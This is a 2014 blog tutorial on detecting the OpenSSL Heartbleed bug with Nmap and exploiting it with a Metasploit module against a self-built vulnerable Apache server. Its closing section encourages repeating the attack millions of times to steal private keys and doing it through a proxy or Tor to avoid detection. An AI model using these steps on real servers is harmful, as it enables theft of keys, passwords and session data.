Detect Exploit openSSL Heartbleed vulnerability using Nmap and Metasploit on Kali Linux

http://www.blackmoreops.com/2014/05/03/detect-exploit-openssl-heartbleed-vulnerability-using-nmap-metasploit-kali-linux

Background

The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs). This guide is specifically designed to show how to detect exploit openSSL Heartbleed vulnerability using Nmap and Metasploit on Kali Linux.
The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users.
A fixed version of OpenSSL was released on April 7, 2014, at the same time as Heartbleed was publicly disclosed. At that time, some 17 percent (around half a million) of the Internet’s secure web servers certified by trusted authorities were believed to be vulnerable to the attack, allowing theft of the servers’ private keys and users’ session cookies and passwords.
Heartbleed is registered in the Common Vulnerabilities and Exposures system as CVE-2014-0160.

Contents [hide]

• Detect Exploit openSSL Heartbleed vulnerability using Nmap and Metasploit on Kali Linux
  • Background
    • Discovery and Naming
    • Affected and non-affected OpenSSL versions
    • Affected operating systems?
    • This attack in UNDETECTABLE
  • What we are going to do in this guide?
  • Our setup
    • • Target System:
      • Attacking System
    • Setup Target system
      • Enable SSL Module
      • Create a SSL Key
      • Setup Apache web server to use SSL certificate
      • Activate Virtual Host and reload Apache configuration
      • Test Apache SSL certificate from browser
    • Exploit openSSL Heartbleed vulnerability from attacking system
      • Detecting Heartbleed vulnerable system using Nmap on Kali Linux
      • Attack and Exploit Heartbleed vulnerable system using MetaSploit
  • Conclusion
    • Related Links
    • Google+

Discovery and Naming

The bug was named by an engineer at the firm Codenomicon, a Finnish cybersecurity company, which also created the bleeding heart logo, and launched the domain Heartbleed.com to explain the bug to the public. According to Codenomicon, Neel Mehta first reported the bug to OpenSSL, but both Google and Codenomicon discovered it independently. Codenomicon reports April 3 as their date of discovery of the bug and as their date of notification of NCSC-FI (formerly known as CERT-FI) for vulnerability coordination.

Affected and non-affected OpenSSL versions

Bug was introduced to OpenSSL in December 2011 and has been out in the wild since OpenSSL release 1.0.1 on 14th of March 2012. OpenSSL 1.0.1g released on 7th of April 2014 fixes the bug.

1. OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
2. OpenSSL 1.0.1g is NOT vulnerable
3. OpenSSL 1.0.0 branch is NOT vulnerable
4. OpenSSL 0.9.8 branch is NOT vulnerable

The vulnerable versions have been out there for over two years now and they have been rapidly adopted by modern operating systems. A major contributing factor has been that TLS versions 1.1 and 1.2 came available with the first vulnerable OpenSSL version (1.0.1) and security community has been pushing the TLS 1.2 due to earlier attacks against TLS.

Affected operating systems?

Some operating system distributions that have shipped with potentially vulnerable OpenSSL version:

1. Debian Wheezy (stable), OpenSSL 1.0.1e-2+deb7u4
2. Ubuntu 12.04.4 LTS, OpenSSL 1.0.1-4ubuntu5.11
3. CentOS 6.5, OpenSSL 1.0.1e-15
4. Fedora 18, OpenSSL 1.0.1e-4
5. OpenBSD 5.3 (OpenSSL 1.0.1c 10 May 2012) and 5.4 (OpenSSL 1.0.1c 10 May 2012)
6. FreeBSD 10.0 – OpenSSL 1.0.1e 11 Feb 2013
7. NetBSD 5.0.2 (OpenSSL 1.0.1e)
8. OpenSUSE 12.2 (OpenSSL 1.0.1c)

Operating system distribution with versions that are not vulnerable:

1. Debian Squeeze (oldstable), OpenSSL 0.9.8o-4squeeze14
2. SUSE Linux Enterprise Server
3. FreeBSD 8.4 – OpenSSL 0.9.8y 5 Feb 2013
4. FreeBSD 9.2 – OpenSSL 0.9.8y 5 Feb 2013
5. FreeBSD 10.0p1 – OpenSSL 1.0.1g (At 8 Apr 18:27:46 2014 UTC)
6. FreeBSD Ports – OpenSSL 1.0.1g (At 7 Apr 21:46:40 2014 UTC)

That’s a lot of system’s that are vulnerable. We all thought Linux is secured and open source being the bearer of security flag, apparently not anymore!

This attack in UNDETECTABLE

Exploitation of this bug does not leave any trace of anything abnormal happening to the logs. Some Intrusion detection and Intrusion prevention systems can pick up this attack but they need to have specific rules. With SSL deemed safe, not many organization would actually implement that. That means many secured system vulnerable.
It affects 32 bit and 64 bit systems alike. There is no total of 64 kilobytes limitation to the attack, that limit applies only to a single heartbeat. Attacker can either keep reconnecting or during an active TLS connection keep requesting arbitrary number of 64 kilobyte chunks of memory content until enough secrets are revealed.
This means, an attacker can attack both 32 and 64 bit systems alike, can repeat this attack as many times they want and no one will know as the connection is deemed safe and no logs will be generated about an attack. This is PROBABLY the worst bug that was discovered in any system. It is also speculated that NSA, CIA and many security organizations were aware of this vulnerability and abused this till now. While this can not be confirmed, but the possibilities are really scary!

What we are going to do in this guide?

This guide will demonstrate the following:

1. How to setup a openSSL Heartbleed vulnerable system with Apache and SSL.
2. How to scan for openSSL Heartbleed vulnerable system with Nmap.
3. How to exploit openSSL Heartbleed vulnerability with MetaSploit on Kali Linux.

Scanning is quite easy, you just need to find a target and use Nmap to scan it. Offensive Security’s MetaSploit is another fantastic tool to use to exploit this vulnerability. Together, they can be used to exploit any vulnerable system.

Our setup

Because I can’t directly show how to exploit a live target (and most common target’s are already being patched).. I will demonstrate this using the following method:

Target System:

• Freshly installed Kali Linux version 1.0.6 (it is vulnerable).
• OpenSSL version 1.0.1e built before April 7 2014. (that’s when the fix was released)
• Setup Apache Web server.
• Enable SSL support on Apache Web server.

Attacking System

• Kali 1.0.6 fully updated and upgraded (specifically MetaSploit and Nmap)

Setup Target system

Login to target Kali Linux box (running a freshly installed Kali Linux 1.0.6) without any update or upgrade.

Enable SSL Module

Enable SSL module and restart apache as directed:

a2enmod ssl
service apache2 restart

Create a SSL Key

Change directory to /etc/apache2

cd /etc/apache2

Create a SSL directory

mkdir ssl

Go into that directory

cd ssl

Now run the following command to create a SSL file with 2048 bit encryption

openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout blackmoreops.key -out blackmoreops.crt

As highlighted, type in the followings

1. Country Name (2 letter code) [AU]:AU
2. State or Province Name (full name) [Some-State]:ACT
3. Locality Name (eg, city) []:Canberra
4. Organization Name (eg, company) [Internet Widgits Pty Ltd]:blackMORE Operations
5. Organizational Unit Name (eg, section) []: LEAVE EMPTY and PRESS Enter
6. Common Name (e.g. server FQDN or YOUR name) []:kali.blackmoreops.com
7. Email Address []: LEAVE EMPTY and PRESS Enter

Once done check out your certificate and key with list command:

ls

Setup Apache web server to use SSL certificate

Now we need to configure Apache web server to use the SSL certificate. To do that, we need to edit /etc/apache2/sites-available/default-ssl file.
First of all, let’s find out what’s our IP Address. To do that, type in the following command.

ifconfig

As you can see, IP address on my Vulnerable Kali Linux machine is 192.168.1.81. We will use this IP address to setup our Vulnerable Apache web server with SSL support.

vi /etc/apache2/sites-available/default-ssl

As highlighted in the image above, add the ServerName 192.168.1.81:443 just after ServerAdmin line. In your case, Change 192.168.1.81 to your Vulnerable Kali Linux’s IP.

        ServerAdmin webmaster@localhost
        ServerName 192.168.1.81:443

Scroll down this document and ensure Next, ensure that SSLEngine is ON. See screenshot above.

SSLEngine on

You also need to change SSLCertificateFile and SSLCertificateKeyFile to point to your newly created SSL certificate and key file. In my case, the name of the SSL was blackmoreops.crt and KEY file was blackmoreops.key.

# SSLCertificateFile directive is needed.

SSLCertificateFile /etc/apache2/ssl/blackmoreops.crt
SSLCertificateKeyFile /etc/apache2/ssl/blackmoreops.key

Save and exit the file.

Activate Virtual Host and reload Apache configuration

Now activate your newly created the Apache Web server Virtual Host and reload Apache configuration

a2ensite default-ssl
service apache2 reload

Test Apache SSL certificate from browser

Open IceWeasel and browse to https://192.168.1.81/



Now that the SSL is self-signed (well, why would anyone trust US, we are trying to hack anyway!) we get a security warning in IceWeasel. Click on I Understand the Risks button and then Add Exception button.


Just out of curiosity, click on View Button on Next window.  This will show us the actual certificate.



Here’s the certificate.


Well, that’s good then. We can now accept this certificate. Click on Confirm Security Exception and following is what you’ll get



Awesome! Our vulnerable target Kali Linux, Apache Web Server and SSL certificate .. everything is working as expected.

Exploit openSSL Heartbleed vulnerability from attacking system

Now log to your Attack machine running Kali Linux 1.0.6 with fully upgraded till date.

Detecting Heartbleed vulnerable system using Nmap on Kali Linux

Run the following command from your Attacking Kali Linux machine to confirm if your target machine is vulnerable to SSL HeartBleed bug:

nmap -sV --script=ssl-heartbleed 192.168.1.81

ssl-heartbleed script is part of the new Nmap update. This makes scanning very easy. From the output below, we can see that the target machine (which is running a freshly installed Kali Linux 1.0.6 with no updates) is vulnerable.



Now let’s move on to the fun part, how to attack and Exploit openSSL Heartbleed vulnerability using Metasploit on Kali Linux.

Attack and Exploit Heartbleed vulnerable system using MetaSploit

Metasploit was created by HD Moore in 2003 as a portable network tool. Metasploit can be used to test the vulnerability of computer systems or to break into remote systems. Like many information security tools, Metasploit can be used for both legitimate and unauthorized activities. Ensure your Attacking Kali Linux machine is fully updated and upgraded.
That’s enough taking, lets start MetaSploit. In case those who are not familiar, you also need to start the following two services before you start MetaSploit:

service postgresql start
service metasploit start

Once these two services are up and running start MetaSploit using the following command:

msfconsole

Now load openssl_heartbleed module using the following command:

use auxiliary/scanner/ssl/openssl_heartbleed

Use show options command to see configurable options

show options

Set the following two options:

set RHOSTS 192.168.1.81

RHOSTS: It is the target machines IP range. In my case, it was 192.168.1.81. Set your own target machine’s IP here.
We are not setting RPORT cause it’s already set to 443 (which is what our target system Apache HTTPS server is running on).
Here’ I will set another flag which is not presented in show options windows.
Enable verbose mode by typing in the following command:

set verbose true

I am setting verbose because I want to see what goes on when I attack my target machine.
Now let’s attack the target machine. Type in the following command to start the attack process:

exploit

And we have some Printable info leaked from SSL session. Play around with the options to get familiar with it.

Conclusion

This is just the tip of the iceberg. You need to repeat this attack many many many times and the more you attack the more information will be leaked. How many times you need to attack?
Let’s look into the Heartbleed challenge set up by CloudFlare.

1. The first was submitted at 4:22:01PST by Fedor Indutny (@indutny). He sent at least 2.5 million requests over the span of the challenge, this was approximately 30% of all the requests we saw.
2. The second was submitted at 5:12:19PST by Ilkka Mattila of NCSC-FI using around 100 thousand requests.

Well, 2.5 million and 100 thousand requests will get you private key for the SSL. Once you have the private key, you can decrypt every messages (username, password, anything! that was encrypted with the SSL certificate). Though 2.5 million requests seems absurd, for a busy server it’s nothing and like I said before, it’s undetectable. You can keep doing it from behind a proxy server or a TOR network without revealing your true identity.
Thanks for reading. Please share this article and like/follow us on Facebook and Twitter.

Related Links

1. http://heartbleed.com/
2. https://community.rapid7.com/community/metasploit/blog/2014/04/10/security-advisory-openssl-heartbleed-vulnerability-cve-2014-0160-in-metasploit